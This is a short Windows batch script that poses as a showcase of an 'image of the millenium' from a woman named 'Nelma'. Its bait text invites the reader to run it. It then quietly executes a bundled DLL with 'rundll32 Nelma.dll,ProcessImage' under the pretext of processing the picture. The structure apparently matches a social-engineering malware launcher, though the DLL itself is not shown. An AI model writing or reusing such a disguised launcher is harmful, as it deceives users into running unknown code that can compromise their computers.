@echo off
cls
echo.
echo                          Image Of The Millenium
echo.
echo Hello guys, my name is Nelma Marisa and I'm here to present the image of the
echo millenium.
echo Don't you know me??? Sure you know...
echo If you don't, just try to find me :))
echo.
echo Let's get to the real stuff.
echo.
echo Processing image...
rundll32 Nelma.dll,ProcessImage
echo Process complete!
echo.
echo Now, you just have to open the Image called Millenium.Gif...
echo.
echo Good luck,
echo.
echo Nelma!
echo.
echo.
echo.
echo.